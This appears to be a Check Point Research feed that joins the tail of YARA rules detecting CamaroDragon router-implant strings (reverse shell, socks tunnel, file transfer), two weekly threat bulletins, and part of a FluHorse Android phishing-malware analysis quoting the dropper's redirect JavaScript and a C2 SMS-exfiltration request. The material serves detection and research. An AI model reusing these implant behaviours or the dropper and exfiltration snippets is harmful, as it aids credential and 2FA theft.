		$debug_55 = "not connected, begin to connect!"
		$debug_56 = "not enough sapce to malloc a port relay info!"
		$debug_57 = "other file transfer task oper %d"
		$debug_58 = "recv check file '%s' exists request, file %s"
		$debug_59 = "remove current task!"
		$debug_60 = "remove_file_transfer_info_from_list"
		$debug_61 = "reverse_shell can not find bash or sh"
		$debug_62 = "shell create connection to %s:%d succeed"
		$debug_63 = "shell create_shell_pty_session succeed!"
		$debug_64 = "shell process connect port cmd->port"
		$debug_65 = "shell_pty_session_free_cb, socket=%d"
		$debug_66 = "socks tun connect lan"
		$debug_67 = "socks tun create connection %p to %s:%d succeed!"
		$debug_68 = "socks tun port %d already opened!"
		$debug_69 = "socks tun process connect port"
		$debug_70 = "socks tun try connect lan"
		$debug_71 = "trans file create connection to %s:%d succeed!"
		$debug_72 = "trans_file_start"
		$debug_73 = "tun_info->free_list"
		$debug_74 = "tun_info->used_list"
		$debug_75 = "unkown file transfer sub cmd"
		$debug_76 = "unkown socks tun sub cmd"
		$debug_77 = "shell_conn_session_connect_cb"
		$debug_78 = "shell_conn_session_free_cb"
		$debug_79 = "shell_get_body_from_http_rsp"
		$debug_80 = "shell_get_http_body"
		$debug_81 = "shell_get_http_filed"


		// Commands
		$command_1 = "SOCKS TUN REQ_CONNECT_PORT"
		$command_2 = "SOCKS TUN NATPORT_COMM_CMD_CONNECT"
		$command_3 = "SOCKS TUN NATPORT_COMM_CMD_OPEN"
		$command_4 = "SOCKS TUN NATPORT_COMM_CMD_DATA"
		$command_5 = "SOCKS TUN NATPORT_COMM_CMD_CLOSE"
		$command_6 = "SOCKS TUN NATPORT_COMM_CMD_DISCONNECT"
		$command_7 = "SOCKS TUN NATPORT_COMM_CMD_CHECK"
		$command_8 = "SOCKS TUN REQ_MODULE_HEARTBEAT"
		$command_9 = "NET_REQ_HORSE_SHELL REQ_CONNECT_PORT"
		$command_10 = "FILE_TRANSFER REQ_CONNECT_PORT"
		$command_11 = "FILE_TRANSFER_OPER_DOWNLOAD"
		$command_12 = "FILE_TRANSFER_OPER_UPLOAD"
		$command_13 = "FILE_TRANSFER_OPER_CANCEL_DOWNLOAD"
		$command_14 = "FILE_TRANSFER_OPER_CANCEL_UPLOAD"
		$command_15 = "FILE_TRANSFER_TRANS_FILE_DATA"
		$command_16 = "FILE_TRANSFER_OPER_DELETE"
		$command_17 = "FILE_TRANSFER_OPER_QUERY"
		$command_18 = "FILE_TRANSFER_OPER_CHECK_EXISTS"
		$command_19 = "REQ_MODULE_HEARTBEAT"

		// Error strings
		$error_1 = " > .remote_shell.log"
		$error_2 = "calloc mem for hall_device_online_req failed!"
		$error_3 = "conn_listening_conn bind sock=%d failed"
		$error_4 = "conn_listening_conn listen sock=%d failed"
		$error_5 = "conn_listening_conn set sock=%d address failed"
		$error_6 = "conn_listening_conn set sock=%d nonblock failed"
		$error_7 = "conn_listening_conn set sock=%d reuse address failed"
		$error_8 = "conn_listening_conn set sock=%d tcp no delay failed"
		$error_9 = "conn_tcp_conn connect sock=%d failed,err=%d"
		$error_10 = "conn_tcp_conn set sock=%d address failed,err=%d"
		$error_11 = "conn_tcp_conn set sock=%d nonblock failed,err=%d"
		$error_12 = "conn_tcp_conn set sock=%d reuse address failed,err=%d"
		$error_13 = "conn_tcp_conn set sock=%d tcp no delay failed,err=%d"
		$error_14 = "conn_udp_conn bind sock=%d failed"
		$error_15 = "conn_udp_conn set sock=%d address failed"
		$error_16 = "conn_udp_conn set sock=%d nonblock failed"
		$error_17 = "conn_udp_conn set sock=%d reuse address failed"
		$error_18 = "create file_transfer_info failed!"
		$error_19 = "create g_file_transfer_info_list failed!"
		$error_20 = "create g_socks_tun_list failed!"
		$error_21 = "create shell conn session failed!"
		$error_22 = "crypto_decrypt_buf error,"
		$error_23 = "delete file:%s fialed"
		$error_24 = "disconnect this http conn"
		$error_25 = "download file %s failed, safe read length=%d from fd=%d failed, retlen=%d!"
		$error_26 = "file transfer download open file %s fialed!"
		$error_27 = "file transfer process connect port failed, ret = %d!"
		$error_28 = "file transfer upload open file %s failed"
		$error_29 = "find connected ipv4_port ipv4=%s, port=%d failed!"
		$error_30 = "find connected port_relay_info ipv4=%s, port=%d failed!"
		$error_31 = "find ipv4=%s, port=%d by lan failed!"
		$error_32 = "get a free port_relay_info  failed , not enough sapce to save lan ipv4 and port"
		$error_33 = "http connect failed, errno=%d, reason=%s"
		$error_34 = "http data length %d too long"
		$error_35 = "init conf failed"
		$error_36 = "open fialed ret=%d"
		$error_37 = "peek http rsp failed!"
		$error_38 = "peek socks tun data from %s:%d sock=%d failed!"
		$error_39 = "read ip failed, %m"
		$error_40 = "resolve online domain failed"
		$error_41 = "send data to dst socket %d failed!"
		$error_42 = "send failed (sock=%d,err=%d)"
		$error_43 = "sendto failed (peer address=%s,err=%d)"
		$error_45 = "set socket opt failed, %m!"
		$error_46 = "shell create connection to %s:%d failed!"
		$error_47 = "shell create_shell_pty_session failed!"
		$error_48 = "shell process connect port failed, ret = %d!"
		$error_49 = "socks tun connect lan '%s:%d' failed!"
		$error_50 = "socks tun create connection to %s:%d failed!"
		$error_51 = "socks tun port %d already opened!"
		$error_52 = "socks tun process connect port failed, ret = %d!"
		$error_53 = "socks tun try connect lan '%s:%d' failed!"
		$error_54 = "socks_tun_connect_cb failed %p"
		$error_55 = "socks_tun_info_new failed!"
		$error_56 = "start shell '%s' failed!"
		$error_57 = "tcp online create conn failed!"
		$error_58 = "tcp online create http_online_info_t failed!"
		$error_59 = "trans file create connection to %s:%d failed!"
		$error_60 = "try connect failed"
		$error_61 = "try connect lan '%s:%d' failed!"
		$error_62 = "wzsw_init failed"

		// function names
		$function_1 = "shell_conn_session_connect_cb"
		$function_2 = "shell_conn_session_free_cb"
		$function_3 = "shell_get_body_from_http_rsp"
		$function_4 = "shell_get_http_body"
		$function_5 = "shell_get_http_filed"
		$function_6 = "send_file_transfer_conn_heart_beat"
		$function_7 = "send_file_transfer_http_data_net_packet"
		$function_8 = "send_horse_shell_http_data_net_packet"
		$function_9 = "send_module_heart_beat"
		$function_10 = "send_socks_tun_cmd_info_packet"
		$function_11 = "send_socks_tun_conn_heart_beat"
		$function_12 = "send_socks_tun_http_data_net_packet"
		$function_13 = "send_socks_tun_net_packet"
		$function_14 = "send_socks_tun_status_packet"
		$function_15 = "socks_get_body_from_http_rsp"
		$function_16 = "socks_get_http_body"
		$function_17 = "socks_get_http_filed"
		$function_18 = "socks_tun_conn_cb"
		$function_19 = "socks_tun_conn_free_cb"
		$function_20 = "socks_tun_conn_lan_cb"
		$function_21 = "socks_tun_conn_lan_free_cb"
		$function_22 = "socks_tun_connect_cb"
		$function_23 = "socks_tun_connect_lan_cb"
		$function_24 = "socks_tun_info_free"
		$function_25 = "socks_tun_info_new"
		$function_26 = "socks_tun_process_check"
		$function_27 = "socks_tun_process_connect_port"
		$function_28 = "socks_tun_process_connect"
		$function_29 = "socks_tun_process_data"
		$function_30 = "socks_tun_process_disconnect"
		$function_31 = "socks_tun_process_open"
		$function_32 = "socks_tun_start"
		$function_33 = "socks_tun_try_connect_lan_port_cb"
		$function_34 = "check_file_transfer_conn_heart_beat"
		$function_35 = "check_socks_tun_conn_heart_beat"
		$function_36 = "conn_init_tcp_conn"
		$function_37 = "conn_marked_close"
		$function_38 = "conn_read_buffer_length"
		$function_39 = "conn_set_callback"
		$function_40 = "conn_set_free_callback"
		$function_41 = "conn_set_user_data"
		$function_42 = "conn_start_read"
		$function_43 = "conn_start_write"
		$function_44 = "conn_stop_write"
		$function_45 = "conn_tcp_conn"
		$function_46 = "conn_uninit_containers"
		$function_47 = "find_connected_port_relay_info"
		$function_48 = "find_port_relay_info_by_lan"
		$function_49 = "find_start_connect_port_relay_info"
		$function_50 = "get_free_port_relay_info"
		$function_51 = "get_port_relay_info_from_list_by_port_relay_conn"
		$function_52 = "get_port_relay_info"
		$function_53 = "horse_main"
		$function_54 = "process_dev_online"
		$function_55 = "process_http_read_events"
		$function_56 = "process_shell_conn_session_read_events"
		$function_57 = "process_shell_conn_session_write_events"
		$function_58 = "put_port_relay_info"
		$function_59 = "send_file_transfer_conn_heart_beat"
		$function_60 = "send_socks_tun_conn_heart_beat"
		$function_61 = "process_file_transfer_read_events"
		$function_62 = "process_file_transfer_write_events"
		$function_63 = "process_pty_conn_read_events"
		$function_64 = "process_pty_conn_write_events"
		$function_65 = "process_shell_conn_connect_port"
		$function_66 = "process_shell_conn_session_read_events"
		$function_67 = "process_shell_conn_session_write_events"
		$function_68 = "process_socks_tun_lan_conn_read_events"
		$function_69 = "process_socks_tun_read_events"
		$function_70 = "process_transfile_task"
		$function_71 = "put_port_relay_info"
		$function_72 = "socks_get_body_from_http_rsp"
		$function_73 = "socks_get_http_body"
		$function_74 = "socks_get_http_filed"
		$function_75 = "socks_tun_conn_cb"
		$function_76 = "socks_tun_conn_free_cb"
		$function_77 = "socks_tun_conn_lan_cb"
		$function_78 = "socks_tun_conn_lan_free_cb"
		$function_79 = "socks_tun_connect_cb"
		$function_80 = "socks_tun_connect_lan_cb"
		$function_81 = "socks_tun_info_free"
		$function_82 = "socks_tun_info_new"
		$function_83 = "socks_tun_process_check"
		$function_84 = "socks_tun_process_connect_port"
		$function_85 = "socks_tun_process_connect"
		$function_86 = "socks_tun_process_data"
		$function_87 = "socks_tun_process_disconnect"
		$function_88 = "socks_tun_process_open"
		$function_89 = "socks_tun_start"
		$function_90 = "socks_tun_try_connect_lan_port_cb"

		// Globals
		$global_1 = "g_socks_tun_list"


	condition:
		filesize < 2MB and
		3 of ($crypto_*) or
		2 of ($filename_*) or
		3 of ($debug_*) or
		any of ($command_*) or
		3 of ($error_*) or
		3 of ($function_*) or
		$global_1 or
		5 of them
}

rule apt_CN_CamaroDragon_sheel_strings {
	meta:
		author = "Itay Cohen @ Check Point Research"
		date = "2023-04-01"
		description = "Detects CamaroDragon's sheel tool."
		hash = "7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a"
		reference = ""
	
	strings:
		$ = "write failed.open fail."
		$ = "open fail.%m"
		$ = "./sheel -h server_ip -p server_port -i update_index[0-4] [-r]"
		$ = "./sheel -h"
		$ = "update server list success!"
	
	condition:
		filesize < 12KB and
		3 of them
}

The post The Dragon Who Sold His Camaro: Analyzing Custom Router Implant appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 15th May, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• The Swedish-Swiss multinational automation company ABB has been a victim of a ransomware attack conducted by the Russian Black Basta ransomware group. The threat actors have attacked the company’s Windows Active Directory, affecting hundreds of devices. To prevent the spread of ransomware to its customers, ABB terminated VPN connections with other networks.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.BlackBasta; Ransomware.Wins.Blackbasta)

• The Japanese automaker Toyota has suffered a ten years long data breach resulting in the exposure of vehicles information of more than 2M clients in Japan. The breach was due to a cloud database misconfiguration that allowed anyone to access its contents without a password. The exposed data includes car locations with time stamps, chassis numbers and the in-vehicle GPS navigation terminal ID number.
• The US healthcare software provider NextGen Healthcare has informed of a data breach that compromised the personal data of more than 1M patients. The threat actors managed to access patients’ names, dates of birth, addresses and Social Security numbers.
• Sysco, the American food distribution company, has disclosed a data breach that exposed the data of customers and suppliers in the US and Canada, as well as Social Security numbers and account numbers of its US employees.
• The data storage giant Western Digital has confirmed a data breach that exposed the personal information of the company’s clients. The leaked data includes names, billing and shipping addresses, email address and phone numbers. The threat actors claimed they are not affiliated with the AlphV (aka Black Cat) ransomware gang but would use that group’s leak site to threaten and extort the company.
• The online chat platform Discord has notified about a data breach caused by a third-party ticket support agent account that was hacked. The attack has exposed users’ data, including email addresses, customer service messages, and tickets attachments.
• The Korean Seoul National University Hospital (SNUH) has been a victim of a data breach, affecting 831K patients and employees. The attack has conducted by North Korean threat actors, which targeted the hospital’s internal network to gain sensitive medical information and personal details. Local media in South Korea linked the attack to the Kimsuky APT group.

VULNERABILITIES AND PATCHES

• Microsoft’s Patch Tuesday fixes 38 flaws, including three zero-day vulnerabilities. Among those is the Windows OLE flaw (CVE-2023-29325) in Microsoft Outlook that can be exploited using specially crafted emails. Successful exploitation could result in the execution of remote code on the victim’s machine.

Check Point IPS provides protection against this threat (Microsoft Windows OLE Remote Code Execution (CVE-2023-29325))

• Researchers have discovered a new Linux NetFilter kernel flaw (CVE-2023-32233) that allows unprivileged local users to escalate privileges and gain complete control on the affected system.
• An unauthenticated privilege escalation vulnerability (CVE-2023-32243) has been disclosed in the popular WordPress plugin Essential Addons for Elementor. The flaw allows unauthenticated users to elevate their privilege to reset the password of any user, including administrators.

THREAT INTELLIGENCE REPORT

• Check Point Research has released April 2023’s threat index, highlighting a substantial malspam campaign of Trojan Qbot, which came second in the index. Meanwhile, Internet-of-Things (IoT) malware Mirai made it back on the list for the first time in a year, and Healthcare moved up to become the second most attacked industry.

Check Point Harmony Endpoint and Threat Emulation provide protection against those threats (Trojan.Wins.Qbot; Trojan.Downloader.Win.Qbot; Banker.Wins.Qbot; Trojan.Wins.Mirai)

• A new ransomware family dubbed Maori has been analyzed by researchers. The variant, written in Go, targets Linux platforms, and encrypts only the Home directory, which allows a very quick encryption process.
• Researchers have discovered a new APT dubbed Red Stinger (aka Bad Magic), targeting military, transportation and critical infrastructure related to the Russo-Ukrainian conflict. The threat actors managed to exfiltrate snapshots, USB drives, keyboard strokes, and microphone recordings for surveillance and data collection purposes.

Check Point Threat Emulation provides protection against this threat (Technique.Win.PowerShellBase64.D, Trojan.Win.PowerMagic.A, Technique.Win.MalScript.la.B, Dropper.Win.GenDrop.la.J, Technique.Win.MalMsi.la.A)

• A joint cybersecurity advisory regarding the Russian FSB’s Snake malware has been published by American, English, Canadian and Australian security agencies. The malware is used to gather intelligence from sensitive targets, and its infrastructure been observed by security agencies in more than 50 countries.

The post 15th May – Threat Intelligence Report appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 8th May, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• The City of Dallas, Texas has suffered a ransomware attack conducted by Royal ransomware gang. The attack caused a network outage of its Information and Technology Services (ITS), including Dallas police department, Dallas fire-rescue, Dallas municipal court, payment systems and more.

Check Point Harmony Endpoint provides protection against this threat (Ransomware.Win.Royal)

• ALPHV (aka Blackcat) ransomware gang claims to have attacked the Australian commercial law firm HWL Ebsworth. The threat actors claimed to have access to 4TB worth of HWL Ebsworth data, including employee CVs, IDs, financial reports, accounting data, client documentations, credit card information, and a complete network map.

Check Point Harmony Endpoint and Check Point Threat Emulation provide protection against this threat (Ransomware.Wins.BlackCat; Ransomware_Linux_BlackCat)

• AvosLocker ransomware gang has claimed responsibility for a ransomware attack affecting the IT systems of the Virginia-based Bluefield University. The threat actors compromised the university’s RamAlert emergency broadcast system, to inform students and university staff about the attack. According to the gang’s alerts, the stolen data consists of 1.2TB of files, including thousands of students’ admissions data, which will be leaked on dark web forums unless they pay the ransom.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.AvosLocker; Ransomware_Linux_AvosLocker; Ransomware.Wins.Avoslocker; Trojan.Wins.Avos)

• After launching a devastating attack on the city of Oakland on April, the Play ransomware gang has taken responsibility for another attacks in the United States on Massachusetts city of Lowell. The gang claims to have stolen an undisclosed amount of data that includes passports, government IDs, financial documents and more.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Play)

• T-Mobile has revealed its second data breach that occurred in 2023, which caused the leakage of hundreds of the company clients’ data. The leaked data could cause a potential fraud and identity theft, as it includes sensitive personal information such as contacts information, accounts number and associated phone numbers, T-Mobile accounts PIN, social security numbers, government IDs and more

VULNERABILITIES AND PATCHES

• Apple has issued the first-ever security updates for its AirPods and Beats headphones products that fixes an authentication vulnerability (CVE-2023-27964) in which attackers could gain access to users’ headphones through a Bluetooth connection.

Check Point IPS provides protection against this threat (Microsoft Message Queuing Remote Code Execution (CVE-2023-21554))

• Researchers have disclosed a vulnerability in TikTok social media platform that could allow attackers to monitor users’ activity on both mobile and desktop devices. They found that the window message event handler doesn’t properly validate the origin of incoming messages, providing attackers access to sensitive user information. The vulnerability has been already patched.
• Security researcher has discovered a cross-site scripting vulnerability (CVE-2023-30777) at the Advanced Custom Fields and Advanced Custom Fields Pro WordPress plugins, which have over 2 million active installations. This vulnerability could cause the theft of sensitive information, as well as privilege escalation on WordPress site. The vulnerability was fixed in version 6.1.6 and later.

THREAT INTELLIGENCE REPORTS

• Check Point Research has analyzed a cluster of activity that deploys ROKRAT, a malware previously attributed to a North Korean threat actor commonly referred to as APT37, Inky Squid, RedEyes, Reaper or ScarCruft. New tools affiliated with the same actor were deployed in various multi-stage infection chains, including another custom backdoor, GOLDBACKDOOR, and the commodity malware Amadey.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Technique.Win.EmbedExeLnk; Trojan.Wins.SusLNK; Injector.Win.RemoteThread; Technique.Win.MalOfficeVBA; Exploit.Win.MalChildren)

• Check Point Research revealed new Android malware called FluHorse. The malware mimics legitimate applications, most of which have more than 1,000,000 installations. The malware steals victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails.

Check Point Harmony Mobile provides protection against this threat (FLU_HORSE_STR)

• Check Point Research has noticed a surge in cyberattacks leveraging websites associated with the ChatGPT brand. These attacks involve the distribution of malware and phishing attempts through websites that appear to be related to ChatGPT, to lure users into downloading malicious files or disclose sensitive information.

The post 8th May – Threat Intelligence Report appeared first on Check Point Research.

Research by: Alex Shamshur, Sam Handelman, Raman Ladutska

Introduction

In the latest research conducted by Check Point Research, we describe a newly discovered malware called FluHorse. The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.

^{Image 1 – One of the malware samples still not detected on VirusTotal (VT) after 3 months.}

Cyber-crime operators often get creative in their aim of complicating the malware analysis. They can use tricks like evasion techniques, obfuscation, and long delays before execution – all to sneak past virtual environments and confound researchers. Usually, these tricks have custom implementation that require plenty of effort on their creators’ behalf. Only in rare cases are malware samples hard to detect and analyze even when they are developed with widely available technologies.

Quite surprisingly, no custom implemented tricks are used inside FluHorse, as the malware authors relied solely on open-source frameworks for the development process. Although some of the applications are created partly with Kotlin, the malicious functionality is implemented with Flutter – and this is where we focused our technical efforts. Flutter is an open-source UI software development kit created by Google. It is used to develop cross-platform applications for various platforms, including Android and iOS for mobile devices, with a single codebase. What makes Flutter an appealing choice for malware developers is the use of a custom virtual machine (VM) to support different platforms and its ease of use for creation of GUI elements. In addition, analyzing such applications is complicated, due to the custom VM, which makes this framework a perfect solution for Android phishing attacks, as it turned out to be.

In the article below, we describe different targeted markets in several countries and compare phishing applications with the legitimate ones – differences are pretty hard to spot at first glance). We note the available tools for Flutter-application analysis while also providing the enhancements that resulted in our open-source contribution: https://github.com/Guardsquare/flutter-re-demo/pull/4. We go through all the pitfalls encountered during our research and provide solutions on how to bypass them. Finally, we give an overview of Command-and-Control (C&C) communication of the malware as well as dive deeply into the details of the network infrastructure analysis.

Mimicked applications

The malware operators made an eclectic selection of targeted sectors for particular countries, using one mimicked application in each country:

The companies behind the legitimate mimicked applications are trusted and have good reputations, which makes such applications very appealing to the attackers as they are sure to attract solvent customers:

Far Eastern Electronic Toll Collection Co., Ltd (FETC) company in Taiwan – The developer of the ETC APK has approximately 16 million transactions per day and more than 6 million users according to the company’s website.

VPBank – One of the largest private banks in Vietnam, with total assets of more than 631 trillion dong (approximately $26 billion USD) at the end of December 2022. The business includes retail, corporate, consumer finance, and wealth management operations.

One more case includes a mimicked major transportation application – we do not describe it thoroughly in this article.

Although the spheres are different, the malware operators made an effort to carefully mimic all the key interface details to avoid raising any suspicions. We meticulously go through the details of GUI in different applications later in the report, in the chapter “Phishing scheme ”.

There are also some malicious applications that are connected to the Dating sphere, but we did not find any matching applications that the malware attempts to mimic. In this scenario, the scheme is a bit different: the malware serves as a browser to the phishing site where the victim is supposed to enter the sensitive data. These applications are aimed at Chinese-speaking users.

^{Image 2 – An icon of Dating malicious application (translated as “Night Love”).}

This information is summarized in the next image:

^{Image 3 – Applications that are mimicked or proxied by the malware.}

Phishing scheme

Let’s take a look at how the phishing scheme is implemented in different variants of the applications. It’s interesting to note that malicious applications do not contain anything except for several replicas of windows to provide a victim with input possibilities. No additional functions or checks were added. This deliberate simplicity leads us to the conclusion that the malware operators did not put much effort into the programming part of their creation… Or they could have made this decision on purpose to further reduce the chances of being detected by security solutions.

Whatever their intention was, the scheme works pretty well. After the victim enters sensitive data, it is exfiltrated to the C&C server. Meanwhile, the malware asks the victim to wait for several minutes while “the data is being processed.” At this step, the SMS interception feature takes the stage and redirects all the incoming SMS traffic to the malicious server. If the malware actors enter stolen credentials or credit card data and then are asked to input Two Factor Authentication (2FA) code, this is intercepted as well. The diagram below summarizes the phishing scheme in a graphical form:

^{Image 4 – How the malware performs phishing attacks.}

Please note that depending on the type of malicious application (targeting Electronic Toll, Banking or Dating users), credentials or credit card numbers may not be required.

Infection chain and targets

Before the malicious applications are installed on the victims’ devices, they must first be delivered. This is where email lures come in handy. We traced infection chains for different types of malicious applications and discovered multiple high-profile entities among the recipient of these emails, including employees of the government sector and large industrial companies.

Email lures are a good use of social engineering and are aligned with the alleged purpose of subsequently installed malicious APK: paying tolls.

This is an example of an email lure with the fetc.net.tw-notice@twfetc.com sender address:

^{Image 5 – Example of an email sent by malware operators to government recipient.}

This is the email translation:

Dear eTag user

Your one-time toll of 128 yuan expires on January 10, 2023. To avoid

a fine of 300 yuan per transaction, please use your mobile phone to click
and download the Yuantong Electric Collection App as soon as possible

Pay online. https://www.fetc-net[.]com

Far Eastern Electronic Toll Collection Co,Ltd.All Right Reserved.

Yuantong Electric has trademarks and copyrights, please do not copy or
reprint without authorization.

If you have any questions, please call Yuantong Customer Service Line 02-77161998.

Thanks.

The malicious fetc-net[.]com domain used by the malware operators is very similar to  fetc.net.tw, which is the official site of FETC company.

On this malicious website, the malware actors added an additional protection layer to ensure that only the victims are able to download the APK: it is downloaded in the case if a target’s user agent matches the expected one. This check is performed via a client-side JavaScript:

var user = navigator.userAgent;
if (user.match(/(iphone os)/i)) {
	console.log("isphone");}
else if (user.match(/ipad/i)) {
	console.log("isipad");}
else if (user.match(/(midp|ucweb|android|windows ce|windows mobile)/i)) {
	window.location.href = "fetc.apk";
};

After the malware is installed, it requires SMS permissions:

^{Image 6 – ETC APK makes a request for SMS permissions.}

The permissions obtained at this step will come into play just after the victim enters the sensitive data. And this brings us straight to the next chapter where the attack scheme is described.

Malicious applications: step-by-step GUI analysis

Let’s take a more detailed look at all the types of malicious applications we encountered.

Malicious Electronic Toll Collection APK

This application contains only 3 windows:

^{Image 7 – Windows shown in sequence by the malicious ETC APK.}

The first window asks for user credentials, and the second one for the credit card data. All this sensitive data is exfiltrated to the malicious C&C server. Next, the third window asks the user to wait for 10 minutes because the “system is busy.” The hope is that the user will close the application, or at least not suspect anything wrong for a reasonable period of time. While the user is lulled into a false sense of security by the “system busy” message, the malware operators perform all their required actions, i.e., intercept all the incoming SMS with 2FA codes and make use of the stolen data.

The entire GUI of this decoy application looks like a pretty neat copy of the original ETC application for collecting tolls. This is the visual comparison of the malicious and legitimate application entry windows:

^{Image 8 – Original entry window (left) and the malicious APK entry window (right).}

The original application does not show any fields to log in or enter user credentials. Instead, there is a separate window for this purpose:

^{Image 9 – Original application log in form.}

Malicious VPBank APK

This application contains only 2 windows:

^{Image 10 – Windows shown in sequence by the malicious VPBank APK.}

The principle is the same as in other malicious APKs: the user is asked to enter the credentials and then wait for 15 minutes (as opposed to 10 minutes in malicious ETC APK). During this time, the malware intercepts all the incoming SMS, thus providing the malicious actors with all the 2FA codes they may require. Please note that this application does not ask for credit card details.

The comparison between the malicious and legitimate application login windows:

^{Image 11 – Original login window (left) and the malicious APK entry window (right).}

As you can see, the malicious copy looks pretty good, even with certain GUI elements missing.

Malicious Dating APK

The Dating application does not contain any windows. Instead, it effectively functions as a browser leading to the phishing dating site. However, the principle of stealing and processing the data remains the same.

We do not have screenshots of all the steps interacting with the victim, as at the time of writing this article the malicious servers responsible for processing stolen data from this APK were not active. According to the code, only credit card data is stolen, and no credentials are asked for.

This is how the entry to the dating site looks inside the application:

^{Image 12 – Window of the phishing dating site shown inside the APK.}

The translation of the shown message follows:

^{Image 13 – The translation of the message shown on the phishing site.}

Technical details

The analysis of Flutter-based applications, compared to the analysis of pure Android applications, requires some intermediate steps to reach our goal.

There are already several good existing guidelines that we used as a basis for our technical analysis:

• Reverse Engineering Flutter apps by tst.sh
• The Current State & Future of Reversing Flutter Apps by Guardsquare

We introduced some technical and quality-of-life improvements to the open-source tools used in those publications.

Digging deep

As we mentioned in the introduction, Flutter uses a custom virtual environment to support multi-platform development with a single code base. A specific programming language, called Dart, is used for the development. Analyzing the Flutter platform code gets a bit easier as it is available as an open-source project, but can still be a tedious process.

^{Image 14 – Dart presentation in the Flutter Github page.}

Let’s take a look at some of the complications we encountered when dealing with an ad-hoc realm of Flutter runtime. We dissected an APK with the hash 2811f0426f23a7a3b6a8d8bb7e1bcd79e495026f4dcdc1c2fd218097c98de684.

Flutter runtime for ARM uses its own stack pointer register (R15) instead of the built-in stack pointer (SP). Which register is used as a stack pointer makes no difference in code execution or in the reverse-engineering process. However, it makes a big difference for the decompiler. Because of a non-standard register usage, a wrong and ugly pseudocode is generated.

A good way to start the malware analysis is to determine the protocol of the communication with the C&C servers. This can say a lot about the malicious functionality. There is one string inside that corresponds to the site we saw in the phishing email:

^{Image 15 – Address of the C&C server among the strings inside the malicious APK.}

However, when we try to find some references to this string, the analysis fails:

^{Image 16 – Absence of references to the C&C server string in IDA.}

Our goal is to create a reference to this string to locate the code where the C&C communication is performed.

The articles we mentioned earlier introduce some nice open-source tools to deal with Flutter applications: flutter-re-demo and reFlutter. Their main idea is to use runtime snapshots to create Dart objects and find references to them. The main purpose of reFlutter is to gather the functions’ names while flutter-re-demo allows us to work with the memory dumps collected during the application execution.

However, in addition to memory snapshots, some more runtime information is required. Flutter runtime uses a heap to create objects and stores the pointer to created objects in a special area called the Object Pool. The pointer to this pool is passed to the method in a register X27. We need to find the location of the Object Pool.

flutter-re-demo uses Frida to collect memory dumps and to get the Object Pool address. If we run our APK with the dump_flutter_memory.js script available in the flutter-re-demo repository, we see the desired address:

^{Image 17 – Frida script output with the required addresses.}

Now we have all the required elements to start a productive reverse engineering.

After loading the dumps with map_dart_vm_memory.py and running the script create_dart_objects.py, we can now see at least some of the objects:

^{Image 18 – Objects created by the script.}

We have to mention here our first addition to the original flutter-re-demo scripts as a part of the open-source contribution.

There is a script called create_dart_objects.py which intends to create Dart objects. The script works by walking over Object Pool, parsing records and creating objects. There are a bunch of objects that the script has no information about – for them the script creates the following structures which describe object format:

struct DartUnkObjNNN {
	uint8_t is_canonical_and_gc;
	uint8_t size_tag;
	uint16_t cid;
	uint32_t padding;
	uint64_t unk;
}

NNN here is replaced by the “class id” number, like this:

^{Image 19 – Struct, created by create_dart_objects.py.}

During the Flutter application reverse-engineering, we noticed that the last field (unk) is frequently used as a pointer. We considered converting this field from a simple QWORD to OFFSET QWORD. This could give us some false positives but could also be very helpful in creating references. We therefore decided to change the field type for unkin structures created by the script. This is our change to the original script:

^{Image 20 – Our changes to the dart_obj_create.py script.}

The repository we mentioned contains a script for creating references to Dart objects: add_xref_to_dart_objects.py. When you run it, the script goes through the code and creates references to the Dart objects created by create_dart_objects.py scripts. After this process, we still have only one reference to the string we are interested in, namely the reference from Object Pool:

^{Image 21 – There are no references to the C&C server URL.}

Our first thought was maybe there are no cross-references at all? But no, there are several cross-references present, e.g., this object has references:

^{Image 22 – A couple of references from functions to objects.}

This is the object which is referenced from the function:

^{Image 23 – How the reference looks in the function code.}

Let’s investigate why we do not see our reference. Walking through the code of add_xref_to_dart_objects.py brings us to the file dart_obj_xref.py. This file also walks through the code, tries to extract references to data based on the register X27, counts offsets of these references, and finally creates IDA references. Analysis of the code shows that the original script supports two variants of ARM code that access the object:

1:

ADD             X17, X27, #0x18,LSL#12
LDR             X17, [X17,#0xA58]

2:

LDR             X24, [X27,#0x20]

Does the code use some other instructions to reference the register X27? Let’s check. For convenience, let’s modify the script and add a comment to each instruction processed with X27:

^{Image 24 – dart_obj_xref.py modification.}

We can then inspect a disassembler listing for constructions processed with X27, which have no comment reference to Dart object attached. We can partially automate these actions by generating a listing file with IDA and greping it with grep utility like this:

grep "X27" libapp.lst | grep --invert-match "reference to Dart object"

First, grep finds all strings with X27. Then all those strings fall to the second grep command to print only those strings which contain no reference to Dart object. Therefore, we see only unsupported X27 references.

When we detect an unsupported X27 construction, we add the code to support it in the script. After several iterations, we finally get our references to the C&C address string:

^{Image 25 – References to the C&C address string.}

Let’s inspect these functions starting with sub_70FD611C0C. A brief overview shows that this function intends to do something with the HTTP POST method with the path “/addcontent3” when communicating with the C&C server:

^{Image 26 – Pseudo-code of the sub_70FD611C0C function.}

There is also a reference to this function from another Dart object:

^{Image 27 – Reference to a Dart object.}

As we go through the references, we finally come to the function with the following code:

^{Image 28 – Code responsible for listening to all the incoming SMS.}

This function installs a listener for all incoming SMS messages.

To be absolutely sure we made a correct static analysis, we checked this function on a real device in runtime. Indeed, we caught a POST request to the C&C server.

This is an example of C&C request after the device received an SMS with the text “Fdsa”:

POST    /addcontent3
user-agent: Dart/2.16 (dart:io)
content-type: application/x-www-form-urlencoded; charset=utf-8
accept-encoding: gzip
content-length: 12

Body: ids=&c4=Fdsa

